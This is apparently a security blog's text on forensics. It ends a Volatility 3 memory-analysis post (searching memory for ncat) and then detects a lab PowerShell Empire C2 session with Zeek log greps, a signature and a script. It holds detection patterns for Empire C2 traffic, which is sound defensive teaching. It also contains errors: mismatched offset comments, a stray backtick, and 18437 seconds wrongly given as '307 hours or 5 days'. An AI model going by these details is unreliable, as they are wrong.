<span style="color: white;">0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-AC</span>
<span style="color: white;">E2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Key N/A N/A N/A N/A N/A N/A N/A</span>
<span style="color: white;">* 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEB</span>
<span style="color: white;">FF5CD-ACE2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Value UEME_CTLCUACount:ctor N/A 0 0 0:00:</span>
<span style="color: white;">00.500000 N/A</span>
<span style="color: white;">ff ff ff ff 00 00 00 00 ........</span>
<span style="color: white;">00 00 00 00 00 00 00 00 ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">00 00 80 bf 00 00 80 bf ........</span>
<span style="color: white;">ff ff ff ff 00 00 00 00 ........</span>
<span style="color: white;">00 00 00 00 00 00 00 00 ........</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Leveraging the pool scanner plugin.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.poolscanner.PoolScanner | grep -i ncat</span></b></span>
<span style="color: white;">symbol_table_name1!_EPROCESS 0xd187c11a5000inlayer_name ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c14adcf0 layer_name \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe</span>
<span style="color: white;">symbol_table_name1!_EPROCESS 0xd187c1af3000 layer_name ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e11b60 layer_name \ProgramData\chocolatey\bin\ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e27960 layer_name \Windows\Prefetch\NCAT.EXE-4B4B887F.pf</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e2a200 layer_name \ProgramData\chocolatey\bin\ncat.exe</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e326d0 layer_name \Windows\Prefetch\NCAT.EXE-1B3976EF.pf</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e347a0 layer_name \ncat-0</span>
<span style="color: white;">symbol_table_name1!_FILE_OBJECT 0xd187c1e34930 layer_name \ncat-0</span>
</pre></div>
</div><div><br />Extracting certificate information.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.registry.certificates.Certificates</span></b><span style="color: white;"> | more </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">Certificate path Certificate section Certificate ID Certificate name</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot AutoUpdate -</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 02FAF3E291435468607857694DF5E45B68851868 Sectigo (AddTrust)</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 DigiCert</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 07E032E020B72C3F192F0628A2593A19A70F069E Certum Trusted Network CA</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 2796BAE63F1801E277261BA0D77770028F20EEE4 Go Daddy Class 2 Certification Authority</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Sectigo</span>
<span style="color: white;">Microsoft\SystemCertificates AuthRoot 3679CA35668772304D30A5FB873B0FA77BB70D54 VeriSign Universal Root Certification Authori</span>
<span style="color: white;">ty</span>
</pre></div>
</div><div><br /></div><div>Good enough for me at this point. I have a good enough understanding of how to use Volatiliy3<br /><br /><br /><br /><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com1tag:blogger.com,1999:blog-7303400454979750101.post-54431476356059950592022-02-02T18:58:00.006-08:002022-02-28T10:22:56.975-08:00Powershell Empire - Detection with ZeekTransitioning to Zeek, let's now see what we can learn from a quick analysis.
First up, the version of Zeek I'm using.
<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek4 --version</span>
<span style="color: white;">zeek4 version 4.2.0-dev.448</span>
</pre></div><br />Let's look at this from 3 different perspectives. First, let's simply run Zeek and take a look at the logs that have been created based on our Indicators of Compromise (IoC).
Running Zeek against the pcap file.<div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek --no-checksums -r /home/securitynik/packets/empire-full-session.pcap </span>
</pre></div>
</div><div><br /></div><div><div>Looking at the logs created.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# ls *.log</span>
<span style="color: white;">conn.log dns.log files.log http.log packet_filter.log pe.log reporter.log ssh.log weird.log</span>
</pre></div>
</div><div><br /></div><div><div>In a production environment, you will have lots more logs. So we don't want to go through all the logs. Let's leverage grep to find our IoCs..</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep --perl-regexp "\/(?i)(news|login|admin).*?php" *.log --color=always | more</span>
<span style="color: white;">...</span>
<span style="color: white;">http.log:1637431443.514058 CcC0YB2heOkR9Gnpi4 10.0.0.110 1650 10.0.0.107 443 3 POST 10.0.0.107</span>
<span style="color: white;">/news.php - 1.1 securitynik-launcher-bat-User-Agent - 206 44506 200 OK - - (empty) - - - F4wiHG1bpwW03v71vh - - FghBlt1qKU0utYSHd7 - -</span>
<span style="color: white;">http.log:1637431506.697538 CcC0YB2heOkR9Gnpi4 10.0.0.110 1650 10.0.0.107 443 4 GET 10.0.0.107</span>
<span style="color: white;">/admin/get.php - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 1279 200 OK - - (empty) - - - - - - FvSNLf3mGluOXZ5Qu - text/html</span>
<span style="color: white;">http.log:1637431566.836488 CcC0YB2heOkR9Gnpi4 10.0.0.110 1650 10.0.0.107 443 5 GET 10.0.0.107</span>
<span style="color: white;">/login/process.php - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 1279 200 OK - -(empty) - - - - - - F6xbg04XsiJmRygrwc - text/html</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>At this point, we identify Zeek has logs pertaining to this activity. Let's figure out which logs this activity is found in.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep --perl-regexp "\/(?i)(news|login|admin).*?php" *.log | awk --field-separator ':' '{ print $1 }' | sort | uniq --count | sort --numeric --reverse </span>
<span style="color: white;"> 1807 http.log</span>
</pre></div>
</div><div><br /></div><div><div>Looks like activity was only seen in the http.log. Focusing here a bit more, extracting a few key fields.</div></div><div><br /></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek-cut -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p method host uri < http.log | grep --perl-regexp "\/(?i)(news|login|admin).*?php"</span>
<span style="color: white;">ts uid id.orig_h id.orig_p id.resp_h id.resp_p method host uri</span>
<span style="color: white;">....</span>
<span style="color: white;">2021-11-20T20:21:40-0500 Cp6N4630HCYa17LUa8 10.0.0.110 1697 10.0.0.107 443 GET 10.0.0.107 /news.php</span>
<span style="color: white;">2021-11-20T20:22:20-0500 CwazkE3YeyHUnSxQ7f 10.0.0.110 1723 10.0.0.107 443 GET 10.0.0.107 /admin/get.php</span>
<span style="color: white;">2021-11-20T20:22:38-0500 C9qPFB1lfO6u42p4G3 10.0.0.110 1699 10.0.0.107 443 GET 10.0.0.107 /login/process.php</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Picking on the first UID, to see where else activity has been identified.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep "Cp6N4630HCYa17LUa8" *.log | cut --fields 1 --delimiter ":" | sort | uniq --count | sort --numeric --reverse</span>
<span style="color: white;"> 315 files.log</span>
<span style="color: white;"> 311 http.log</span>
<span style="color: white;"> 1 conn.log</span>
</pre></div>
</div><div><br /></div><div>Looking at the 1 entry in the conn.log, while there is a lot to see, extracting a few fields and looking at the duration, shows this activity lasted 18437.626252 seconds or 307 hours or 5 days.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# zeek-cut -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes < conn.log | grep "C9qPFB1lfO6u42p4G3" </span>
<span style="color: white;">2021-11-20T18:02:04-0500 C9qPFB1lfO6u42p4G3 10.0.0.110 1699 10.0.0.107 443 tcp http 18437.626252 55444 462342</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the files.log, I did not really find anything of interest. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# grep "Cp6N4630HCYa17LUa8" files.log | more</span>
<span style="color: white;">1637449322.213963 FbvsAO3tTXJzOyuaj4 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000479 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;"> -</span>
<span style="color: white;">1637449382.306875 FkJSID2jB0CMQfrcZb 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000484 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;"> -</span>
<span style="color: white;">1637449442.421711 F4DJ7Z1wfsWwZ0INka 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000375 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;"> -</span>
<span style="color: white;">1637449502.518040 Fnn8vklGr2q1mTGt2 10.0.0.107 10.0.0.110 Cp6N4630HCYa17LUa8 HTTP 0 (empty) text/html - 0.000484 - F 1279 1279 0 0 F - - - - - -</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>Additionally, no files were actually extracted as can be seen by the absenece of the extracted folder.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp/zeek]</span>
<span style="color: white;">└─# ls -l extracted_files/</span>
<span style="color: white;">ls: cannot access 'extracted_files/': No such file or directory</span>
</pre></div>
</div><div><br /></div><div><div>We can spend more time poking around. However, the objective was to do some basic detection and we have achieved that. </div><div><br /></div><div><b>Second, let's take a look at a Zeek signature to detect our IoC. </b></div><div><br /></div><div>While Zeek can be used for signature detection, it is not the recommended way to use Zeek. However, since it does provide the capability to perform some basic signature based detection, then let's take advantage of this feature.</div><div><br /></div><div>Couple of different ways to do this. Let's take one.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># This signature is about detecting PowerShell Empire in my lab</span>
<span style="color: white;">signature powershellEmpire</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> # look into the IP Header at offset 6 for tcp </span>
<span style="color: white;"> header ip[9] == 0x06</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span><span> </span># Look for the soruce address representing out protected network</span>
<span style="color: white;"> # Look at the IP header, start at offset 12 and span 4 bytes for the</span>
<span style="color: white;"> # the source IP</span>
<span style="color: white;"> header ip[12:4] == 10.0.0.110/32</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Look for the destination address </span>
<span style="color: white;"> # Look at the IP header, start at offset 15 and span 4 bytes for the</span>
<span style="color: white;"> # the destination IP </span>
<span style="color: white;"> # Consider anything going to none 10.0.0.0/32 destinations as something we don't own.</span>
<span style="color: white;"> header ip[16:4] != 10.0.0.110/32</span>
<span style="color: white;"> </span>
<span style="color: white;"> #</span><span style="color: white;"> Look for destination port 443</span>
<span style="color: white;"> header tcp[2:2] == 443</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Look for the ASCII strings news or admin or login followed by php</span>
<span style="color: white;"> http /.*(news|admin|login).*\.php/</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Ensure the 3-way handshake has completed and</span>
<span style="color: white;"> # The traffic is coming from an originator</span>
<span style="color: white;"> tcp-state established,originator </span>
<span style="color: white;"> </span>
<span style="color: white;"> # Generate an event</span>
<span style="color: white;"> event "SUSPICIOUS POSSIBLE Powershell Empire Activity"</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span>}</span>
</pre></div>
</div><div><br /></div><div>Running Zeek</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# zeek --readfile /home/securitynik/packets/empire-full-session.pcap --rulefile /home/securitynik/packets/powershell.sig --no-checksums</span>
</pre></div>
</div><div><br /></div><div><div>Verifying the files created </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# ls *.log</span>
<span style="color: white;">conn.log dns.log files.log http.log notice.log packet_filter.log pe.log signatures.log ssh.log weird.log</span>
</pre></div>
</div><div><br /></div><div><div>Taking at look at the signature.log file, we see ...</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# zeek-cut -d -m < signatures.log </span>
<span style="color: white;">ts uid src_addr src_port dst_addr dst_port note sig_id event_msg sub_msg sig_count host_count</span>
<span style="color: white;">2021-11-20T13:03:59-0500 CskRYg2jaNXRC0fLy8 10.0.0.110 1650 10.0.0.107 443 Signatures::Sensitive_Signature powershellEmpire 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /news.php - -</span>
<span style="color: white;">2021-11-20T16:03:25-0500 Ckr2TD12vYGon6LR58 10.0.0.110 1686 10.0.0.107 443 Signatures::Sensitive_Signature powershellEmpire 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /admin/get.php - -</span>
<span style="color: white;">2021-11-20T16:51:53-0500 CI3BQ34gmAYusuQ6Yf 10.0.0.110 1689 10.0.0.107 443 Signatures::Sensitive_Signature powershellEmpire 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /login/process.php - -</span>
<span style="color: white;">2021-11-20T17:12:48-0500 CT0hHi3BBoldu0NY3e 10.0.0.110 1690 10.0.0.107 443 Signatures::Sensitive_Signature </span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the notice.log we see ...</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[/tmp]</span>
<span style="color: white;">└─# zeek-cut -d -m < notice.log | more</span>
<span style="color: white;">ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions suppress_for remote_location.country_code remote_location.region remote_location.city remote_location</span>
<span style="color: white;">.latitude remote_location.longitude</span>
<span style="color: white;">2021-11-20T13:03:59-0500 CskRYg2jaNXRC0fLy8 10.0.0.110 1650 10.0.0.107 443 - - - tcp Signatures::Sensitive_S</span>
<span style="color: white;">ignature 10.0.0.110: SUSPICIOUS POSSIBLE Powershell Empire Activity /news.php 10.0.0.110 10.0.0.107 443 - - Notice:</span>
<span style="color: white;">:ACTION_LOG 3600.000000 - - - - -</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><br /><b>Third, Zeek Scripting <br /></b><br />Now that we have used a signature to detect our Powershell Empire activity, let's now get to the more laborious but better way of using Zeek. Specifically it's scripting capabilities.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Define the modules to use</span>
<span style="color: white;">@load base/files/extract</span>
<span style="color: white;">@load base/files/hash</span>
<span style="color: white;">@load base/frameworks/notice</span>
<span style="color: white;">@load base/frameworks/logging</span>
<span style="color: white;">@load base/protocols/conn</span>
<span style="color: white;">@load base/protocols/http</span>
<span style="color: white;">module PSEmpire;</span>
<span style="color: white;">export {</span>
<span style="color: white;"> global hit_count: int = 0;</span>
<span style="color: white;"> global compromised_psempire_hosts: set[addr] = { } &redef &write_expire=7 days;</span>
<span style="color: white;"> global empire_file_names: pattern = /news|admin|process/; </span>
<span style="color: white;"> </span>
<span style="color: white;"> # Setup our notice capabilities</span>
<span style="color: white;"> redef enum Notice::Type += { suspicious_psempire_compromised_host };</span>
<span style="color: white;"> redef Notice::type_suppression_intervals += { [suspicious_psempire_compromised_host] = 1day };</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Setup our own log</span>
<span style="color: white;"> redef enum Log::ID += { PSEmpire::LOG };</span>
<span style="color: white;"> </span>
<span style="color: white;"> option msg = "Say what you want to see"; </span>
<span style="color: white;"> </span>
<span style="color: white;"> # Define the log the fields for the PSEmpire log records</span>
<span style="color: white;"> type Info: record </span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> ts: time &log; # Add a timestamp</span>
<span style="color: white;"> src_host: addr &log; # Add the source IP </span>
<span style="color: white;"> src_port: port &log; # Add the source port</span>
<span style="color: white;"> dst_host: addr &log; # Add the destination IP</span>
<span style="color: white;"> dst_port: port &log; # Add the destination port</span>
<span style="color: white;"> msg: string &log; # Add the message info</span>
<span style="color: white;"> <span> </span>}; </span>
<span style="color: white;"> </span>
<span style="color: white;"> }</span>
<span style="color: white;"># Execute this when zeek starts up</span>
<span style="color: white;">event zeek_init()</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> print "[*] Zeek has started ... ";</span>
<span style="color: white;"> print "[*] Initializing the log stream ... ";</span>
<span style="color: white;"> Log::create_stream(LOG, [$columns=Info, $path="PSEmpire"]);</span>
<span style="color: white;"> print "-----------------------------------------------------"; </span>
<span style="color: white;"> print "[*] Hunting for POWERSHELL EMPIRE Activity ... ";</span>
<span style="color: white;"> print "-----------------------------------------------------";</span>
<span style="color: white;"><span> </span>}</span>
<span style="color: white;"># Check the HTTP Request</span>
<span style="color: white;">event http_request(c: connection, method: string, original_URI: string, unescaped_URI: string, version: string)</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> # print fmt("[*] HTTP Request structure: METHOD:%s | ORIGINAL_URI:%s | UNESCAPED_URI:%s", method, original_URI, unescaped_URI);</span>
<span style="color: white;"> </span>
<span style="color: white;"> if (c$id$orig_h == 10.0.0.110 && c$id$resp_p == 443/tcp && empire_file_names in original_URI)</span>
<span style="color: white;"><span> </span><span> </span><span> </span>{</span>
<span style="color: white;"> PSEmpire::hit_count += 1;</span>
<span style="color: white;"> print fmt("[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY %s:%s -> %s:%s", c$id$orig_h, c$id$orig_p, c$id$resp_h, c$id$resp_p);</span>
<span style="color: white;"> add compromised_psempire_hosts[c$id$orig_h]; </span>
<span style="color: white;"> </span><span style="color: white;"> </span>
<span style="color: white;"> # Write information to our log file</span>
<span style="color: white;"> <span> </span>Log::write(LOG, Info(</span>
<span style="color: white;"> <span> </span>$ts=network_time(),</span>
<span style="color: white;"> <span> </span>$src_host = c$id$orig_h,</span>
<span style="color: white;"> <span> </span>$src_port = c$id$orig_p,</span>
<span style="color: white;"> <span> </span>$dst_host = c$id$resp_h,</span>
<span style="color: white;"> <span> </span>$dst_port = c$id$resp_p,</span>
<span style="color: white;"> <span> </span>$msg = "PowerShell Empire Activity Found!"</span>
<span style="color: white;"> )); </span>
<span style="color: white;"> # Raise our notice</span>
<span style="color: white;"> NOTICE([ </span>
<span style="color: white;"> <span> </span>$note=suspicious_psempire_compromised_host,</span>
<span style="color: white;"> <span> </span>$msg = "SUSPICIOUS POWERSHELL EMPIRE ACTIVITY",</span>
<span style="color: white;"> <span> </span>$sub = "A host is suspected to be infected with Powershell Empire CnC",</span>
<span style="color: white;"> <span> </span>$conn = c,</span>
<span style="color: white;"> <span> </span>$suppress_for = 60min,</span>
<span style="color: white;"> <span> </span>$identifier = cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p) </span>
<span style="color: white;"> <span> </span>]);</span>
<span style="color: white;"> }</span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;"># Get the file Hashes and extract the files</span>
<span style="color: white;">event file_new(f: fa_file) </span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> if (f$source == "HTTP")</span>
<span style="color: white;"> { </span>
<span style="color: white;"><span> </span> <span> </span>for ( cid, cconns in f$conns )</span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> # print cconns$http$uri;</span>
<span style="color: white;"> if ( empire_file_names in cconns$http$uri && cid$orig_h in compromised_psempire_hosts && cid$resp_h != 10.0.0.110 )</span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> local f_name = "EMPTY";</span>
<span style="color: white;"> local f_name_array = split_string(cconns$http$uri, /\//); # Split the string by /</span>
<span style="color: white;"> </span>
<span style="color: white;"> if (|f_name_array| == 3)</span>
<span style="color: white;"> <span> </span>f_name = f_name_array[2];</span>
<span style="color: white;"> else</span>
<span style="color: white;"> <span> </span>f_name = f_name_array[1];</span>
<span style="color: white;"> local extracted_filename = fmt("%s-%s-%s", f$source, f$id, f_name );</span>
<span style="color: white;"> print fmt(" \\-> Extracted file: %s", extracted_filename );</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Get the SHA256 Hashes of the files</span>
<span style="color: white;"> Files::add_analyzer(f, Files::ANALYZER_SHA256);</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Extract the file</span>
<span style="color: white;"> Files::add_analyzer(f, Files::ANALYZER_EXTRACT, [$extract_filename=extracted_filename]);</span>
<span style="color: white;"> }</span>
<span style="color: white;"> <span> </span>}</span>
<span style="color: white;"><span> </span>} `</span>
<span style="color: white;">}</span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;"># Finally some quick code to execute when Zeek ends</span>
<span style="color: white;">event zeek_done()</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> if ( |PSEmpire::hit_count| == 0 )</span>
<span style="color: white;"><span> </span> <span> </span>{</span>
<span style="color: white;"> print "-----------------------------------------------------";</span>
<span style="color: white;"> print "[*] Lucky you! No PowerShell Empire IoCs found!";</span>
<span style="color: white;"> return;</span>
<span style="color: white;"> <span> </span>}</span>
<span style="color: white;"> </span>
<span style="color: white;"> print "-----------------------------------------------------";</span>
<span style="color: white;"> print fmt("[*] We have %d hits for Powershell related IoCs", PSEmpire::hit_count );</span>
<span style="color: white;"> print fmt("[*] There is/are %d unique IP(s) across the %d hits", |compromised_psempire_hosts|, PSEmpire::hit_count);</span>
<span style="color: white;"> for ( ip in compromised_psempire_hosts )</span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> print fmt (" \\- %s", ip);</span>
<span style="color: white;"> <span> </span>}</span>
<span style="color: white;"> print "[*] Zeek has ended. :-( ";</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span><span> </span>}</span>
</pre></div>
</div><div><br /></div><div><div>When the above code is run, get on the screen.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ zeek --readfile /home/securitynik/packets/empire-full-session.pcap --rulefile /home/securitynik/packets/powershell.sig --no-checksums /home/securitynik/packets/psEmpire.zeek </span>
<span style="color: white;">[*] Zeek has started ... </span>
<span style="color: white;">[*] Initializing the log stream ... </span>
